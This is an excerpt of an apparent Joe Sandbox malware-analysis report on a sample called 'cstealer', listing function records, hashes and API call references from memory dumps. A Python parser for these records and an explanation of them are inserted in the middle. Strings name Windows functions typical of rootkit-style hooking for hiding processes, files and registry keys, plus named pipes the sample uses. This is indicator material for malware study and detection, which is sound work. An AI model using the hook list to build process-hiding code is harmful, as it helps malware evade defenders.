• Instruction Fuzzy Hash: FFF0B736218B8485D730EB85E45179ABBE1F388BE5F144116BB8D47BB9CA38C6909B80

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
Similarity
• API ID: AllocLibraryLoadVirtual
• String ID:
• API String ID: 3550616410-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: 398329cb4db2ed4ca767fe8d5a4e9a8539d5239af5a1516b02ff51a455bd4c3d
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 5761DC72B01790C7DA548F1590807A9B3E2FB54BA5F2881619F59877D8EA38E852E780

Control-flow Graph

APIs
  • Part of subcall function 0000014E71281628: GetProcessHeap.KERNEL32 ref: 0000014E71281633
  • Part of subcall function 0000014E71281628: HeapAlloc.KERNEL32 ref: 0000014E71281642
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712816B2
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712816DF
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712816F9
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281719
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281734
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281754
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E7128176F
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E7128178F
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712817AA
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E712817CA
• Sleep.KERNEL32 ref: 0000014E71281AD7
• SleepEx.KERNEL32 ref: 0000014E71281ADD
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712817E5
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281805
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281820
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E71281840
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E7128185B
  • Part of subcall function 0000014E71281628: RegOpenKeyExW.ADVAPI32 ref: 0000014E7128187B
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E71281896
  • Part of subcall function 0000014E71281628: RegCloseKey.ADVAPI32 ref: 0000014E712818A0
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction ID: 1714c45920598ec86e67a74f0c3539577901a3c57681baaef35927f31b664931
• Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction Fuzzy Hash: FC31BA7131178149EB549BA6DA412E9B3E7BB44BF3F0854219F09877F9FE24C851A290

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 560 14e71283844-14e7128384f 561 14e71283869-14e71283870 560->561 562 14e71283851-14e71283864 StrCmpNIW 560->562 562->561 563 14e71283866 562->563 563->561
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 0-3528709123
                                                                                                                                                            • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                            • Instruction ID: 7508334535fa1a9d507ec3434b5e7ea2f55434ff1646f8d531f4a59cd943759f
                                                                                                                                                            • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                            • Instruction Fuzzy Hash: 1ED05E703213C586FB549FEA88C86A0B3D2BB04B66F8841208A0002360EB18C98DB750
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction ID: fd30b4135a47e4e14674e5136d7be7bd17dd7d775703eb5412fc0bea55a61a58
                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction Fuzzy Hash: 96317072205BC08AEB609F64E8803EDB3A1F784755F44442ADB4D57BA8EF38C548D754
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction ID: fbc977cd494d718dee943ce5c59727b77ad1b65654996d4f38853aacfac91a11
                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction Fuzzy Hash: 40313932214B8086DB608B65E8403DEB3E1F7897A5F500526EB9D52BA9DF38C1498B40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction ID: 6eeb1e8aac7f193eae1d1ec7f9d6d2867357cdba1f07a63c99b10fb470118c81
                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction Fuzzy Hash: 71515A76200B848AEB54CF66E44839AB7E2F788FEAF044525DB4A17769DF3CC049D740
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction ID: 7c24aa294964ab1abd883c58356ed4f4c15296c390029ee2d36ead7556732465
                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction Fuzzy Hash: 6531A874200BCAA1EB04EBE9E8656D4F3E3B724366F8054139A0922775EF38C249F3D0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 0e56285bd5da1bb7dc2a0f637ea244bb8522231b169bb3f6fa398e88d53c4f09
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: D781C0317003C186FA54AB2698C13D9F2E3BB957B2F5480A59B05837B6FB38C945B7C8
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32 ref: 0000014E7128CE37
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE4C
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE6D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CE9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CEAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CEBC
                                                                                                                                                            • SetLastError.KERNEL32 ref: 0000014E7128CED7
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF0D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000014E7128ECCC,?,?,?,?,0000014E7128BF9F,?,?,?,?,?,0000014E71287AB0), ref: 0000014E7128CF2C
                                                                                                                                                              • Part of subcall function 0000014E7128D6CC: HeapAlloc.KERNEL32 ref: 0000014E7128D721
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF54
                                                                                                                                                              • Part of subcall function 0000014E7128D744: HeapFree.KERNEL32 ref: 0000014E7128D75A
                                                                                                                                                              • Part of subcall function 0000014E7128D744: GetLastError.KERNEL32 ref: 0000014E7128D764
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF65
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E71290A6B,?,?,?,0000014E7129045C,?,?,?,0000014E7128C84F), ref: 0000014E7128CF76
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction ID: 1b30ba423596484fb5128bd65707c931c46e7bf791391d31e0f543c00011cff9
                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction Fuzzy Hash: 48416C303613D446FB68A7B555513E9F2C3BBA47B6F144724AB3606BF6EF28D421B280
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction ID: 4cbd714d52a7a041574da3b6e1973390df3e65effd47716e8f5b57b748c4e565
                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction Fuzzy Hash: 25213D3261479082EB108B25E4543A9B3E2F789BA6F500615EB5913BB8DF3CC149DB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction ID: 8f1849844508fc59c699d09de6a54d81953bcee2eacf0b3632ce14d61c59d75c
                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction Fuzzy Hash: 21E1AE326047808AEF60DF25D4813DDB7E2F749BAAF200155EF8957BA9EB34C491E780
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction ID: 7acac506dbf0b3f7991eebea42848c6c7b3450c9a6a393424932456b159f4353
                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction Fuzzy Hash: 31E18E726047808AEB60DFA5D4403DDB7E2F785BA9F140115EF8957BA9CF38D191D780
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction ID: 8186f026a51797cedf324e4c7b833b61352a0df49802851986cc84cb3ea2c215
                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction Fuzzy Hash: 1D41E232311B8081EB16DB9AA8007D6B3D3F754BF2F1945269F0A977A4EF38C445A394
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction ID: 82d12ecdb729c6e226656d47255641b3ae2fc389c25ba39a262584264f204760
                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction Fuzzy Hash: AE414F73214BC4CAE760CF65E44479AB7E2F388B99F448129DB8A17B68DF38C549CB40
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0CE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0DF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0F0
                                                                                                                                                            Strings
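The entries above are Joe Sandbox's per-function similarity records: for every function recovered from a memory dump, the report lists the dump it came from, the API and string identifiers the function references, a content hash (Opcode ID / Instruction ID) and a fuzzy hash for near-match pivoting, and, where the IDA plugin resolved them, the imported calls with their call-site address after "ref:". A practical use of this block is to pivot across dumps, for example to notice that the routine with API String ID 849930591-393685449 (the CRT unwind handler referencing "csm") appears both at 0x14E71250000 and at 0x14E71280000. The parser below is an added example written for this page, not Joe Sandbox code; it assumes only the field layout visible above, and the assumption that the fourth dotted component of the .sdmp file name is the dump base (it equals the Offset field in every entry on this page, and the code checks that) is labelled in the comments. The sample input is an abridged copy of three entries from this section.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function entries and pivot on them (added example)."""
import re
from collections import defaultdict

# Constructed sample input: three entries abridged from this report section
# ('Joe Sandbox IDA Plugin', 'Snapshot File', 'Instruction ID' and 'Opcode Fuzzy Hash' bullets dropped).
SAMPLE = """\
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: 21E1AE326047808AEF60DF25D4813DDB7E2F749BAAF200155EF8957BA9EB34C491E780
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 31E18E726047808AEB60DFA5D4403DDB7E2F785BA9F140115EF8957BA9CF38D191D780
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: AE414F73214BC4CAE760CF65E44479AB7E2F388B99F448129DB8A17B68DF38C549CB40
APIs
• FlsGetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D087
• FlsSetValue.KERNEL32(?,?,?,0000014E7128C7DE,?,?,?,?,?,?,?,?,0000014E7128CF9D,?,?,00000001), ref: 0000014E7128D0A6
Strings
"""

BULLET = "•"
FIELD_RE = re.compile(r"^•\s*([^:]+?)\s*:\s*(.*)$")                       # "• Key: value"
CALL_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")  # "• Api.MODULE(args), ref: addr"
SOURCE_RE = re.compile(r"^(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)$")


def parse_entries(text):
    """Split report text into one dict per 'Memory Dump Source' entry."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                      # report lines carry heavy indentation
        if not line:
            continue
        if line == "Memory Dump Source":
            cur = {"fields": {}, "apis": [], "strings": []}
            entries.append(cur)
            section = None
            continue
        if cur is None:
            continue
        if not line.startswith(BULLET):         # a non-bullet line is a section heading
            section = line
            continue
        m = CALL_RE.match(line)
        if section == "APIs" and m:
            name, module, args, ref = m.groups()
            cur["apis"].append({"name": name, "module": module,
                                "args": args.split(","), "ref": int(ref, 16)})
            continue
        if section == "Strings":                # string xrefs are kept raw; none appear in the sample
            cur["strings"].append(line.lstrip(BULLET).strip())
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m.group(1)] = m.group(2)
    return entries


def dump_base(entry):
    """Return (sdmp name, base address). Assumption: the 4th dotted component of the
    .sdmp name is the dump base; it is cross-checked against the Offset field."""
    m = SOURCE_RE.match(entry["fields"]["Source File"])
    if not m:
        raise ValueError("unrecognised Source File line")
    sdmp, offset = m.group(1), int(m.group(2), 16)
    if int(sdmp.split(".")[3], 16) != offset:
        raise ValueError(f"Offset {offset:#x} disagrees with dump name {sdmp}")
    return sdmp, offset


def shared_routines(entries):
    """API String ID -> set of dump bases, keeping only IDs seen in more than one dump."""
    seen = defaultdict(set)
    for e in entries:
        seen[e["fields"]["API String ID"]].add(dump_base(e)[1])
    return {k: v for k, v in seen.items() if len(v) > 1}


def call_refs(entries, api_name):
    """Sorted call-site addresses ('ref:') of one API across all entries."""
    return sorted(c["ref"] for e in entries for c in e["apis"] if c["name"] == api_name)


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for sid, bases in shared_routines(ents).items():
        print(sid, "mapped in", [hex(b) for b in sorted(bases)])
    print("FlsGetValue call sites:", [hex(r) for r in call_refs(ents, "FlsGetValue")])
```

Run against the full report text instead of SAMPLE to list every routine that occurs in more than one dump; identical API String IDs with different Opcode IDs, as in the two unwind-handler entries, are the same library routine mapped at two bases rather than two distinct functions.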
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction ID: bf77c6765b4644b33ee99522ab16b9159603e69d51afd68a77ed61af449e71df
                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction Fuzzy Hash: 66118E307043D841FB68A7B569513E9F2C37F943F6F144324AA3946BFADE68D406A380
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: bfe51ab508fc4dfb401425e8cdfea22ce7602dc8a724d4b31b50981c66ecc966
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: 3D81A1316103C18AFB54BBE9A4413D9F2D3BB85BB6F1844259B08577B6EB38C885B790
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction ID: ca422ea72b13af2cb593632135e9547a287831bedca556353886fdebb9947838
